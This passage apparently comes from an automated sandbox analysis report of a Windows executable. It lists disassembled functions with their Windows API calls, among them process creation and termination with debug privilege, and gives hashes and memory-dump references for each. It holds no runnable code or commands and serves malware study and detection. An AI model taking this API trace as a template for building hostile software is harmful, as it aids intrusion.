                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 006F91EB
                    • SysFreeString.OLEAUT32(?), ref: 006F9215
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                    • String ID:
                    • API String ID: 560350794-0
                    • Opcode ID: 5f207e82e9d8eb66734a1e57dc683b763d388f6bfcb519234cbdeddb9e153371
                    • Instruction ID: 75c56bdab7d38bd4b637479e51efebe9e96402dc0a565dcd1bb38adee7dc06df
                    • Opcode Fuzzy Hash: 5f207e82e9d8eb66734a1e57dc683b763d388f6bfcb519234cbdeddb9e153371
                    • Instruction Fuzzy Hash: 22F10971A00109EFDB14DF94C888EFEB7BABF89314F148159F615AB251DB31AE46CB60
                    Function 006FF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 006FF9C9
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006FFB5C
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006FFB80
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006FFBC0
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006FFBE2
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006FFD5E
                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 006FFD90
                    • CloseHandle.KERNEL32(?), ref: 006FFDBF
                    • CloseHandle.KERNEL32(?), ref: 006FFE36
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                    • String ID:
                    • API String ID: 4090791747-0
                    • Opcode ID: a259bce6f853726af5f520b56e43f7c950e87e8ba72551224c12180f359bbc3d
                    • Instruction ID: 31e4512e09c1f69015d97bc83dc9565bc203c918bcad69eb974be48dd5a75de2
                    • Opcode Fuzzy Hash: a259bce6f853726af5f520b56e43f7c950e87e8ba72551224c12180f359bbc3d
                    • Instruction Fuzzy Hash: 6BE1BF31204345DFCB64EF24C891A7ABBE2AF85354F18856DF9998B3A2CB31DC41CB56
                    Function 006E4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006E38D3,?), ref: 006E48C7
                      • Part of subcall function 006E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006E38D3,?), ref: 006E48E0
                      • Part of subcall function 006E4CD3: GetFileAttributesW.KERNEL32(?,006E3947), ref: 006E4CD4
                    • lstrcmpiW.KERNEL32(?,?), ref: 006E4FE2
                    • _wcscmp.LIBCMT ref: 006E4FFC
                    • MoveFileW.KERNEL32(?,?), ref: 006E5017
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                    • String ID:
                    • API String ID: 793581249-0
                    • Opcode ID: e87148a581a25fe8515d0943788773dc64ff9b831dcec2fb3726942934439978
                    • Instruction ID: 5af026fb322289f752871df20cd502d760394f2ca5d2414b45231cdce348a0e1
                    • Opcode Fuzzy Hash: e87148a581a25fe8515d0943788773dc64ff9b831dcec2fb3726942934439978
                    • Instruction Fuzzy Hash: A85198B20097859BC764EB64CC819DFB3EDAF85700F10492EF285C7151EF74E5888B6A
                    Function 007088B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                    Download Yara Rule
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0070896E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 66961a849945dd68102b4dabdfcd3cb558a3aed75f06245ac9f459b632bb08c0
                    • Instruction ID: 717c3764c31e7b4065fd6f0990a54fdabe9e90ac2a2937d6c5c8d023b0cbea11
                    • Opcode Fuzzy Hash: 66961a849945dd68102b4dabdfcd3cb558a3aed75f06245ac9f459b632bb08c0
                    • Instruction Fuzzy Hash: 1E51A470610208FADFB09F24CC89B697BE5BB15320F508316F591E66E1DF79A9809B86
                    Function 00682B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 006BC547
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006BC569
                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006BC581
                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 006BC59F
                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006BC5C0
                    • DestroyIcon.USER32(00000000), ref: 006BC5CF
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 006BC5EC
                    • DestroyIcon.USER32(?), ref: 006BC5FB
                      • Part of subcall function 0070A71E: DeleteObject.GDI32(00000000), ref: 0070A757
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                    • String ID:
                    • API String ID: 2819616528-0
                    • Opcode ID: 439d906a3b1404ff4850a70265f34f6d79a83e931eed766aaf4412d874015b6c
                    • Instruction ID: 816d5fd4c3f7da6c066c99002d78c838bba4660449b449df2cabc2a7e30cab44
                    • Opcode Fuzzy Hash: 439d906a3b1404ff4850a70265f34f6d79a83e931eed766aaf4412d874015b6c
                    • Instruction Fuzzy Hash: 21517CB460020AEFDB20EF24CC55FEA37B6EB58720F104629F902976A0DB74ED91DB54
                    Function 006D8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,006D8A84,00000B00,?,?), ref: 006D8E0C
                    • HeapAlloc.KERNEL32(00000000,?,006D8A84,00000B00,?,?), ref: 006D8E13
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,006D8A84,00000B00,?,?), ref: 006D8E28
                    • GetCurrentProcess.KERNEL32(?,00000000,?,006D8A84,00000B00,?,?), ref: 006D8E30
                    • DuplicateHandle.KERNEL32(00000000,?,006D8A84,00000B00,?,?), ref: 006D8E33
                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,006D8A84,00000B00,?,?), ref: 006D8E43
                    • GetCurrentProcess.KERNEL32(006D8A84,00000000,?,006D8A84,00000B00,?,?), ref: 006D8E4B
                    • DuplicateHandle.KERNEL32(00000000,?,006D8A84,00000B00,?,?), ref: 006D8E4E
                    • CreateThread.KERNEL32(00000000,00000000,006D8E74,00000000,00000000,00000000), ref: 006D8E68
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                    • String ID:
                    • API String ID: 1957940570-0
                    • Opcode ID: dfc6d2b661047a338680b48ee153d7318227833fd919e02de232999a4b580c78
                    • Instruction ID: 823eecfc86ca9fafa84ff20a62892deec43b7a363aafae941bf565cf5eeffeee
                    • Opcode Fuzzy Hash: dfc6d2b661047a338680b48ee153d7318227833fd919e02de232999a4b580c78
                    • Instruction Fuzzy Hash: 7801A4B5640308FFE620EBA5DC4DF6B3BACEB89711F018521FA05DB6A1CA749C008A24
                    Function 006F9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006D7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?,?,006D799D), ref: 006D766F
                      • Part of subcall function 006D7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?), ref: 006D768A
                      • Part of subcall function 006D7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?), ref: 006D7698
                      • Part of subcall function 006D7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?), ref: 006D76A8
                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 006F9B1B
                    • _memset.LIBCMT ref: 006F9B28
                    • _memset.LIBCMT ref: 006F9C6B
                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 006F9C97
                    • CoTaskMemFree.OLE32(?), ref: 006F9CA2
                    Strings
                    • NULL Pointer assignment, xrefs: 006F9CF0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                    • String ID: NULL Pointer assignment
                    • API String ID: 1300414916-2785691316
                    • Opcode ID: a236a568020ec50f2e625c012cb0cc978057f466d2a8756ea9954dc08c06b5d3
                    • Instruction ID: eac10be7d9f804ffeb1433e115662f1d2057da1086ee9dd3c4f31ab6adbb65e0
                    • Opcode Fuzzy Hash: a236a568020ec50f2e625c012cb0cc978057f466d2a8756ea9954dc08c06b5d3
                    • Instruction Fuzzy Hash: E5914B71D0021DEBDB10DFA5DC85AEEBBBABF08710F20415AF519A7291DB319A45CFA0
                    Function 00706FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00707093
                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 007070A7
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007070C1
                    • _wcscat.LIBCMT ref: 0070711C
                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00707133
                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00707161
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$Window_wcscat
                    • String ID: SysListView32
                    • API String ID: 307300125-78025650
                    • Opcode ID: 14cc92b941d9806b39f792a4262eab07ea25191efee0085172b127f0050a87b7
                    • Instruction ID: 45be20083b3dcac6ae145a8ed2bb9fe1a2f8f6e655c774bef6957a93a9556800
                    • Opcode Fuzzy Hash: 14cc92b941d9806b39f792a4262eab07ea25191efee0085172b127f0050a87b7
                    • Instruction Fuzzy Hash: 8741A070904308EFEB259F64CC85BEA77E9EF08350F10462AF544A72D2D67AAD85CB64
                    Function 006FEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006E3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 006E3EB6
                      • Part of subcall function 006E3E91: Process32FirstW.KERNEL32(00000000,?), ref: 006E3EC4
                      • Part of subcall function 006E3E91: CloseHandle.KERNEL32(00000000), ref: 006E3F8E
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006FECB8
                    • GetLastError.KERNEL32 ref: 006FECCB
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006FECFA
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 006FED77
                    • GetLastError.KERNEL32(00000000), ref: 006FED82
                    • CloseHandle.KERNEL32(00000000), ref: 006FEDB7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                    • String ID: SeDebugPrivilege
                    • API String ID: 2533919879-2896544425
                    • Opcode ID: 76245350dc7b26c32b076aeb7912849f222cd406c9a439cc08667440f9c7853b
                    • Instruction ID: 1a72d11d52ba04f067ac29f1378ff9f49e3ed624e3be6dab9af2db628ff43ad2
                    • Opcode Fuzzy Hash: 76245350dc7b26c32b076aeb7912849f222cd406c9a439cc08667440f9c7853b
                    • Instruction Fuzzy Hash: 5341BF716002049FDB24EF24CC95F7DBBA6AF84714F08805DFA429B7D2DBB5A804CB99
                    Function 006E3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadIconW.USER32(00000000,00007F03), ref: 006E32C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: IconLoad
                    • String ID: blank$info$question$stop$warning
                    • API String ID: 2457776203-404129466
                    • Opcode ID: fb8db6db164a9d1eb6c714c992b2de1fd37e61d090500d473ba78bd6730dc76d
                    • Instruction ID: 15fb236559307a7a9e52d182470a6cbe3e29e14ce909e80a150054785a03bf24
                    • Opcode Fuzzy Hash: fb8db6db164a9d1eb6c714c992b2de1fd37e61d090500d473ba78bd6730dc76d
                    • Instruction Fuzzy Hash: 9811EB3160A3E6BFE7015A56DC47DABB39DEF19370F10002AFA4057382D6659F4149A9
                    Function 006E4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 006E454E
                    • LoadStringW.USER32(00000000), ref: 006E4555
                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 006E456B
                    • LoadStringW.USER32(00000000), ref: 006E4572
                    • _wprintf.LIBCMT ref: 006E4598
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006E45B6
                    Strings
                    • %s (%d) : ==> %s: %s %s, xrefs: 006E4593
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: HandleLoadModuleString$Message_wprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    • API String ID: 3648134473-3128320259
                    • Opcode ID: fc1e5c3e0dfc1498a81406c36c0b2903acebe5e1d3b3a078c4c55daae7331a16
                    • Instruction ID: 7d087a20caea4e2a69f4248321bb1140a271fda0b5d4c571a5084bbaf967d9f9
                    • Opcode Fuzzy Hash: fc1e5c3e0dfc1498a81406c36c0b2903acebe5e1d3b3a078c4c55daae7331a16
                    • Instruction Fuzzy Hash: 2B014FF2900208FFE760E7A09D89EE7776CEB08301F0046A5FB45D2151EE799E858B74
                    Function 0070D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                    • GetSystemMetrics.USER32(0000000F), ref: 0070D78A
                    • GetSystemMetrics.USER32(0000000F), ref: 0070D7AA
                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0070D9E5
                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0070DA03
                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0070DA24
                    • ShowWindow.USER32(00000003,00000000), ref: 0070DA43
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0070DA68
                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0070DA8B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                    • String ID:
                    • API String ID: 1211466189-0
                    • Opcode ID: 3459ead4abe7e521b8b73d36d821350e0531d8dd30837a461abfaa8ce8885d4d
                    • Instruction ID: 93b127b55a15b1c4e1d1d0af62a7f931f2795ce3fd6568a19637ec4f59d3fca5
                    • Opcode Fuzzy Hash: 3459ead4abe7e521b8b73d36d821350e0531d8dd30837a461abfaa8ce8885d4d
                    • Instruction Fuzzy Hash: 5FB16875600225EFDF24CFA8C9897AA7BF1FF44711F08C269EC489A295DB38AD50CB50
                    Function 00682A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                    Download Yara Rule
                    APIs
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,006BC417,00000004,00000000,00000000,00000000), ref: 00682ACF
                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,006BC417,00000004,00000000,00000000,00000000,000000FF), ref: 00682B17
                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,006BC417,00000004,00000000,00000000,00000000), ref: 006BC46A
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,006BC417,00000004,00000000,00000000,00000000), ref: 006BC4D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ShowWindow
                    • String ID:
                    • API String ID: 1268545403-0
                    • Opcode ID: a31e059e8c6c1f5d091b8d0c5551f03b039f4c0ae83530a9ce460ffc880af8ca
                    • Instruction ID: 936222c41338585f32e0ef4cce23bd5b80d23e33a00ec71f7f37d61ef33f2fa4
                    • Opcode Fuzzy Hash: a31e059e8c6c1f5d091b8d0c5551f03b039f4c0ae83530a9ce460ffc880af8ca
                    • Instruction Fuzzy Hash: C4412BB4204682EAC73DAB28CCB87FB7BD3AF46314F54C61DE05746760CA759982D711
                    Function 006E7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                    Download Yara Rule
                    APIs
                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 006E737F
                      • Part of subcall function 006A0FF6: std::exception::exception.LIBCMT ref: 006A102C
                      • Part of subcall function 006A0FF6: __CxxThrowException@8.LIBCMT ref: 006A1041
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 006E73B6
                    • EnterCriticalSection.KERNEL32(?), ref: 006E73D2
                    • _memmove.LIBCMT ref: 006E7420
                    • _memmove.LIBCMT ref: 006E743D
                    • LeaveCriticalSection.KERNEL32(?), ref: 006E744C
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006E7461
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 006E7480
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                    • String ID:
                    • API String ID: 256516436-0
                    • Opcode ID: c17a3ce70aa30a25efacb483f59226a41868099771ef7c67e0e5510b2a2201c4
                    • Instruction ID: f33d90b1af31b51f3a459d8ac37fbe2a0be8ee9f999898048c1a388d8debfaff
                    • Opcode Fuzzy Hash: c17a3ce70aa30a25efacb483f59226a41868099771ef7c67e0e5510b2a2201c4
                    • Instruction Fuzzy Hash: EC31CF31900205EBDF50EF65DC85AAE7BB9FF45300F1481A9F904AB246DB709E10CBA8
                    Function 00706442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 0070645A
                    • GetDC.USER32(00000000), ref: 00706462
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0070646D
                    • ReleaseDC.USER32(00000000,00000000), ref: 00706479
                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007064B5
                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007064C6
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00709299,?,?,000000FF,00000000,?,000000FF,?), ref: 00706500
                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00706520
                    Memory Dump Source
